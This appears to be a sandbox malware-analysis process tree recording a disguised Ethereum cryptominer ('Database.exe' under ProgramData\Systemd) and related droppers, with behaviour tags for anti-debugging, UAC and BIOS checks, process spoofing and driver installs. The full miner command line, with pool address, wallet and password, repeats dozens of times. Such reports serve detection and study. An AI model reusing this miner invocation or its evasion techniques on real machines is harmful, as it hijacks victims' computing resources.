C:\ProgramData\Systemd\Database.exe-epool eth-eu1.nanopool.org:9999 -ewal 0x34B27139451244A628F226fF7405f7E79407B00A -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 70 -tstart 60 -coin eth4⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
-
C:\ProgramData\Systemd\Database.exe-epool eth-eu1.nanopool.org:9999 -ewal 0x34B27139451244A628F226fF7405f7E79407B00A -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 70 -tstart 60 -coin eth4⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
-
C:\ProgramData\Systemd\Database.exe-epool eth-eu1.nanopool.org:9999 -ewal 0x34B27139451244A628F226fF7405f7E79407B00A -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 70 -tstart 60 -coin eth4⤵
- Checks BIOS information in registry
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
-
C:\ProgramData\Systemd\Database.exe-epool eth-eu1.nanopool.org:9999 -ewal 0x34B27139451244A628F226fF7405f7E79407B00A -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 70 -tstart 60 -coin eth4⤵
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
-
C:\ProgramData\Systemd\Database.exe-epool eth-eu1.nanopool.org:9999 -ewal 0x34B27139451244A628F226fF7405f7E79407B00A -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 70 -tstart 60 -coin eth4⤵
- Checks BIOS information in registry
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
-
C:\ProgramData\Systemd\Database.exe-epool eth-eu1.nanopool.org:9999 -ewal 0x34B27139451244A628F226fF7405f7E79407B00A -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 70 -tstart 60 -coin eth4⤵
- Checks BIOS information in registry
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
-
C:\ProgramData\Systemd\Database.exe-epool eth-eu1.nanopool.org:9999 -ewal 0x34B27139451244A628F226fF7405f7E79407B00A -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 70 -tstart 60 -coin eth4⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
-
C:\ProgramData\Systemd\Database.exe-epool eth-eu1.nanopool.org:9999 -ewal 0x34B27139451244A628F226fF7405f7E79407B00A -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 70 -tstart 60 -coin eth4⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
-
-
C:\ProgramData\Systemd\Database.exe-epool eth-eu1.nanopool.org:9999 -ewal 0x34B27139451244A628F226fF7405f7E79407B00A -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 70 -tstart 60 -coin eth4⤵
-
-
C:\ProgramData\Systemd\Database.exe-epool eth-eu1.nanopool.org:9999 -ewal 0x34B27139451244A628F226fF7405f7E79407B00A -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 70 -tstart 60 -coin eth4⤵
- Checks whether UAC is enabled
-
-
C:\ProgramData\Systemd\Database.exe-epool eth-eu1.nanopool.org:9999 -ewal 0x34B27139451244A628F226fF7405f7E79407B00A -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 70 -tstart 60 -coin eth4⤵
- Checks whether UAC is enabled
-
-
C:\ProgramData\Systemd\Database.exe-epool eth-eu1.nanopool.org:9999 -ewal 0x34B27139451244A628F226fF7405f7E79407B00A -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 70 -tstart 60 -coin eth4⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
-
-
C:\ProgramData\Systemd\Database.exe-epool eth-eu1.nanopool.org:9999 -ewal 0x34B27139451244A628F226fF7405f7E79407B00A -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 70 -tstart 60 -coin eth4⤵
- Checks BIOS information in registry
-
-
C:\ProgramData\Systemd\Database.exe-epool eth-eu1.nanopool.org:9999 -ewal 0x34B27139451244A628F226fF7405f7E79407B00A -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 70 -tstart 60 -coin eth4⤵
- Checks whether UAC is enabled
-
-
C:\ProgramData\Systemd\Database.exe-epool eth-eu1.nanopool.org:9999 -ewal 0x34B27139451244A628F226fF7405f7E79407B00A -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 70 -tstart 60 -coin eth4⤵
- Checks BIOS information in registry
-
-
C:\ProgramData\Systemd\Database.exe-epool eth-eu1.nanopool.org:9999 -ewal 0x34B27139451244A628F226fF7405f7E79407B00A -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 70 -tstart 60 -coin eth4⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
-
-
C:\ProgramData\Systemd\Database.exe-epool eth-eu1.nanopool.org:9999 -ewal 0x34B27139451244A628F226fF7405f7E79407B00A -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 70 -tstart 60 -coin eth4⤵
- Checks BIOS information in registry
-
-
C:\ProgramData\Systemd\Database.exe-epool eth-eu1.nanopool.org:9999 -ewal 0x34B27139451244A628F226fF7405f7E79407B00A -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 70 -tstart 60 -coin eth4⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
-
-
C:\ProgramData\Systemd\Database.exe-epool eth-eu1.nanopool.org:9999 -ewal 0x34B27139451244A628F226fF7405f7E79407B00A -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 70 -tstart 60 -coin eth4⤵
- Checks whether UAC is enabled
-
-
C:\ProgramData\Systemd\Database.exe-epool eth-eu1.nanopool.org:9999 -ewal 0x34B27139451244A628F226fF7405f7E79407B00A -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 70 -tstart 60 -coin eth4⤵
- Checks BIOS information in registry
-
-
C:\ProgramData\Systemd\Database.exe-epool eth-eu1.nanopool.org:9999 -ewal 0x34B27139451244A628F226fF7405f7E79407B00A -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 70 -tstart 60 -coin eth4⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
-
-
C:\ProgramData\Systemd\Database.exe-epool eth-eu1.nanopool.org:9999 -ewal 0x34B27139451244A628F226fF7405f7E79407B00A -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 70 -tstart 60 -coin eth4⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
-
-
C:\ProgramData\Systemd\Database.exe-epool eth-eu1.nanopool.org:9999 -ewal 0x34B27139451244A628F226fF7405f7E79407B00A -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 70 -tstart 60 -coin eth4⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
-
-
C:\ProgramData\Systemd\Database.exe-epool eth-eu1.nanopool.org:9999 -ewal 0x34B27139451244A628F226fF7405f7E79407B00A -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 70 -tstart 60 -coin eth4⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Drops file in System32 directory
- Drops file in Windows directory
- Checks SCSI registry key(s)
- Modifies data under HKEY_USERS
-
-
C:\ProgramData\Systemd\Database.exe-epool eth-eu1.nanopool.org:9999 -ewal 0x34B27139451244A628F226fF7405f7E79407B00A -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 70 -tstart 60 -coin eth4⤵
- Checks whether UAC is enabled
-
-
C:\ProgramData\Systemd\Database.exe-epool eth-eu1.nanopool.org:9999 -ewal 0x34B27139451244A628F226fF7405f7E79407B00A -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 70 -tstart 60 -coin eth4⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
-
-
C:\ProgramData\Systemd\Database.exe-epool eth-eu1.nanopool.org:9999 -ewal 0x34B27139451244A628F226fF7405f7E79407B00A -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 70 -tstart 60 -coin eth4⤵
-
-
C:\ProgramData\Systemd\Database.exe-epool eth-eu1.nanopool.org:9999 -ewal 0x34B27139451244A628F226fF7405f7E79407B00A -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 70 -tstart 60 -coin eth4⤵
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
-
C:\ProgramData\Systemd\Database.exe-epool eth-eu1.nanopool.org:9999 -ewal 0x34B27139451244A628F226fF7405f7E79407B00A -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 70 -tstart 60 -coin eth4⤵
- Checks BIOS information in registry
-
-
C:\ProgramData\Systemd\Database.exe-epool eth-eu1.nanopool.org:9999 -ewal 0x34B27139451244A628F226fF7405f7E79407B00A -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 70 -tstart 60 -coin eth4⤵
- Checks whether UAC is enabled
-
-
C:\ProgramData\Systemd\Database.exe-epool eth-eu1.nanopool.org:9999 -ewal 0x34B27139451244A628F226fF7405f7E79407B00A -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 70 -tstart 60 -coin eth4⤵
- Checks BIOS information in registry
-
-
C:\ProgramData\Systemd\Database.exe-epool eth-eu1.nanopool.org:9999 -ewal 0x34B27139451244A628F226fF7405f7E79407B00A -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 70 -tstart 60 -coin eth4⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
-
C:\ProgramData\Systemd\Database.exe-epool eth-eu1.nanopool.org:9999 -ewal 0x34B27139451244A628F226fF7405f7E79407B00A -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 70 -tstart 60 -coin eth4⤵
- Checks whether UAC is enabled
-
-
C:\ProgramData\Systemd\Database.exe-epool eth-eu1.nanopool.org:9999 -ewal 0x34B27139451244A628F226fF7405f7E79407B00A -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 70 -tstart 60 -coin eth4⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
-
-
C:\ProgramData\Systemd\Database.exe-epool eth-eu1.nanopool.org:9999 -ewal 0x34B27139451244A628F226fF7405f7E79407B00A -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 70 -tstart 60 -coin eth4⤵
- Checks whether UAC is enabled
-
-
C:\ProgramData\Systemd\Database.exe-epool eth-eu1.nanopool.org:9999 -ewal 0x34B27139451244A628F226fF7405f7E79407B00A -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 70 -tstart 60 -coin eth4⤵
- Checks whether UAC is enabled
-
-
C:\ProgramData\Systemd\Database.exe-epool eth-eu1.nanopool.org:9999 -ewal 0x34B27139451244A628F226fF7405f7E79407B00A -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 70 -tstart 60 -coin eth4⤵
-
-
C:\ProgramData\Systemd\Database.exe-epool eth-eu1.nanopool.org:9999 -ewal 0x34B27139451244A628F226fF7405f7E79407B00A -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 70 -tstart 60 -coin eth4⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
-
-
C:\ProgramData\Systemd\Database.exe-epool eth-eu1.nanopool.org:9999 -ewal 0x34B27139451244A628F226fF7405f7E79407B00A -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 70 -tstart 60 -coin eth4⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
-
-
C:\ProgramData\Systemd\Database.exe-epool eth-eu1.nanopool.org:9999 -ewal 0x34B27139451244A628F226fF7405f7E79407B00A -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 70 -tstart 60 -coin eth4⤵
- Checks whether UAC is enabled
-
-
C:\ProgramData\Systemd\Database.exe-epool eth-eu1.nanopool.org:9999 -ewal 0x34B27139451244A628F226fF7405f7E79407B00A -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 70 -tstart 60 -coin eth4⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
-
-
C:\ProgramData\Systemd\Database.exe-epool eth-eu1.nanopool.org:9999 -ewal 0x34B27139451244A628F226fF7405f7E79407B00A -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 70 -tstart 60 -coin eth4⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
-
-
C:\ProgramData\Systemd\Database.exe-epool eth-eu1.nanopool.org:9999 -ewal 0x34B27139451244A628F226fF7405f7E79407B00A -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 70 -tstart 60 -coin eth4⤵
- Checks BIOS information in registry
-
-
C:\ProgramData\Systemd\Database.exe-epool eth-eu1.nanopool.org:9999 -ewal 0x34B27139451244A628F226fF7405f7E79407B00A -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 70 -tstart 60 -coin eth4⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
-
-
C:\ProgramData\Systemd\Database.exe-epool eth-eu1.nanopool.org:9999 -ewal 0x34B27139451244A628F226fF7405f7E79407B00A -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 70 -tstart 60 -coin eth4⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
-
-
C:\ProgramData\Systemd\Database.exe-epool eth-eu1.nanopool.org:9999 -ewal 0x34B27139451244A628F226fF7405f7E79407B00A -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 70 -tstart 60 -coin eth4⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
-
C:\ProgramData\Systemd\Database.exe-epool eth-eu1.nanopool.org:9999 -ewal 0x34B27139451244A628F226fF7405f7E79407B00A -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 70 -tstart 60 -coin eth4⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
-
-
C:\ProgramData\Systemd\Database.exe-epool eth-eu1.nanopool.org:9999 -ewal 0x34B27139451244A628F226fF7405f7E79407B00A -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 70 -tstart 60 -coin eth4⤵
- Checks whether UAC is enabled
-
-
C:\ProgramData\Systemd\Database.exe-epool eth-eu1.nanopool.org:9999 -ewal 0x34B27139451244A628F226fF7405f7E79407B00A -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 70 -tstart 60 -coin eth4⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
-
-
C:\ProgramData\Systemd\Database.exe-epool eth-eu1.nanopool.org:9999 -ewal 0x34B27139451244A628F226fF7405f7E79407B00A -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 70 -tstart 60 -coin eth4⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
-
-
C:\ProgramData\Systemd\Database.exe-epool eth-eu1.nanopool.org:9999 -ewal 0x34B27139451244A628F226fF7405f7E79407B00A -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 70 -tstart 60 -coin eth4⤵
- Checks whether UAC is enabled
-
-
C:\ProgramData\Systemd\Database.exe-epool eth-eu1.nanopool.org:9999 -ewal 0x34B27139451244A628F226fF7405f7E79407B00A -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 70 -tstart 60 -coin eth4⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
-
-
C:\ProgramData\Systemd\Database.exe-epool eth-eu1.nanopool.org:9999 -ewal 0x34B27139451244A628F226fF7405f7E79407B00A -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 70 -tstart 60 -coin eth4⤵
- Checks whether UAC is enabled
-
-
C:\ProgramData\Systemd\Database.exe-epool eth-eu1.nanopool.org:9999 -ewal 0x34B27139451244A628F226fF7405f7E79407B00A -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 70 -tstart 60 -coin eth4⤵
- Checks whether UAC is enabled
-
-
C:\ProgramData\Systemd\Database.exe-epool eth-eu1.nanopool.org:9999 -ewal 0x34B27139451244A628F226fF7405f7E79407B00A -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 70 -tstart 60 -coin eth4⤵
-
-
C:\ProgramData\Systemd\Database.exe-epool eth-eu1.nanopool.org:9999 -ewal 0x34B27139451244A628F226fF7405f7E79407B00A -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 70 -tstart 60 -coin eth4⤵
- Checks whether UAC is enabled
-
-
C:\ProgramData\Systemd\Database.exe-epool eth-eu1.nanopool.org:9999 -ewal 0x34B27139451244A628F226fF7405f7E79407B00A -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 70 -tstart 60 -coin eth4⤵
- Checks BIOS information in registry
-
-
C:\ProgramData\Systemd\Database.exe-epool eth-eu1.nanopool.org:9999 -ewal 0x34B27139451244A628F226fF7405f7E79407B00A -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 70 -tstart 60 -coin eth4⤵
- Checks BIOS information in registry
-
-
C:\ProgramData\Systemd\Database.exe-epool eth-eu1.nanopool.org:9999 -ewal 0x34B27139451244A628F226fF7405f7E79407B00A -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 70 -tstart 60 -coin eth4⤵
-
-
C:\ProgramData\Systemd\Database.exe-epool eth-eu1.nanopool.org:9999 -ewal 0x34B27139451244A628F226fF7405f7E79407B00A -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 70 -tstart 60 -coin eth4⤵
- Checks BIOS information in registry
-
-
C:\ProgramData\Systemd\Database.exe-epool eth-eu1.nanopool.org:9999 -ewal 0x34B27139451244A628F226fF7405f7E79407B00A -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 70 -tstart 60 -coin eth4⤵
- Checks whether UAC is enabled
-
-
C:\ProgramData\Systemd\Database.exe-epool eth-eu1.nanopool.org:9999 -ewal 0x34B27139451244A628F226fF7405f7E79407B00A -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 70 -tstart 60 -coin eth4⤵
- Checks whether UAC is enabled
-
-
C:\ProgramData\Systemd\Database.exe-epool eth-eu1.nanopool.org:9999 -ewal 0x34B27139451244A628F226fF7405f7E79407B00A -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 70 -tstart 60 -coin eth4⤵
-
-
C:\ProgramData\Systemd\Database.exe-epool eth-eu1.nanopool.org:9999 -ewal 0x34B27139451244A628F226fF7405f7E79407B00A -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 70 -tstart 60 -coin eth4⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
-
-
C:\ProgramData\Systemd\Database.exe-epool eth-eu1.nanopool.org:9999 -ewal 0x34B27139451244A628F226fF7405f7E79407B00A -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 70 -tstart 60 -coin eth4⤵
- Checks BIOS information in registry
-
-
C:\ProgramData\Systemd\Database.exe-epool eth-eu1.nanopool.org:9999 -ewal 0x34B27139451244A628F226fF7405f7E79407B00A -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 70 -tstart 60 -coin eth4⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
-
-
C:\ProgramData\Systemd\Database.exe-epool eth-eu1.nanopool.org:9999 -ewal 0x34B27139451244A628F226fF7405f7E79407B00A -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 70 -tstart 60 -coin eth4⤵
- Checks whether UAC is enabled
-
-
C:\ProgramData\Systemd\Database.exe-epool eth-eu1.nanopool.org:9999 -ewal 0x34B27139451244A628F226fF7405f7E79407B00A -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 70 -tstart 60 -coin eth4⤵
- Checks whether UAC is enabled
-
-
C:\ProgramData\Systemd\Database.exe-epool eth-eu1.nanopool.org:9999 -ewal 0x34B27139451244A628F226fF7405f7E79407B00A -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 70 -tstart 60 -coin eth4⤵
- Checks whether UAC is enabled
-
-
C:\ProgramData\Systemd\Database.exe-epool eth-eu1.nanopool.org:9999 -ewal 0x34B27139451244A628F226fF7405f7E79407B00A -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 70 -tstart 60 -coin eth4⤵
- Checks BIOS information in registry
-
-
C:\ProgramData\Systemd\Database.exe-epool eth-eu1.nanopool.org:9999 -ewal 0x34B27139451244A628F226fF7405f7E79407B00A -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 70 -tstart 60 -coin eth4⤵
-
-
C:\ProgramData\Systemd\Database.exe-epool eth-eu1.nanopool.org:9999 -ewal 0x34B27139451244A628F226fF7405f7E79407B00A -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 70 -tstart 60 -coin eth4⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
-
-
C:\ProgramData\Systemd\Database.exe-epool eth-eu1.nanopool.org:9999 -ewal 0x34B27139451244A628F226fF7405f7E79407B00A -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 70 -tstart 60 -coin eth4⤵
-
-
C:\ProgramData\Systemd\Database.exe-epool eth-eu1.nanopool.org:9999 -ewal 0x34B27139451244A628F226fF7405f7E79407B00A -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 70 -tstart 60 -coin eth4⤵
- Checks whether UAC is enabled
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\B047.exeC:\Users\Admin\AppData\Local\Temp\B047.exe1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1936 -s 2962⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
-
C:\Windows\system32\rUNdlL32.eXerUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main1⤵
- Process spawned unexpected child process
-
C:\Windows\SysWOW64\rundll32.exerUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main2⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7740 -s 4483⤵
- Program crash
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 624 -p 7740 -ip 77401⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Users\Admin\AppData\Local\Temp\CAC5.exeC:\Users\Admin\AppData\Local\Temp\CAC5.exe1⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 604 -p 1936 -ip 19361⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Users\Admin\AppData\Local\Temp\ED13.exeC:\Users\Admin\AppData\Local\Temp\ED13.exe1⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 656 -p 1360 -ip 13601⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Suspicious use of SetThreadContext
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s DeviceInstall1⤵
- Drops file in Windows directory
- Checks SCSI registry key(s)
-
C:\Windows\system32\DrvInst.exeDrvInst.exe "4" "0" "C:\Users\Admin\AppData\Local\Temp\{2be62451-22be-2646-b7e2-bb6b8b3d770f}\oemvista.inf" "9" "4d14a44ff" "00000000000000F0" "WinSta0\Default" "0000000000000160" "208" "c:\program files (x86)\maskvpn\driver\win764"2⤵
-
-
C:\Windows\system32\DrvInst.exeDrvInst.exe "2" "211" "ROOT\NET\0000" "C:\Windows\INF\oem2.inf" "oem2.inf:3beb73aff103cc24:tap0901.ndi:9.0.0.21:tap0901," "4d14a44ff" "00000000000000F0" "a9ce"2⤵
- Drops file in Drivers directory
- Drops file in Windows directory
- Checks SCSI registry key(s)
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s DsmSvc1⤵
- Checks SCSI registry key(s)
- Modifies data under HKEY_USERS
-
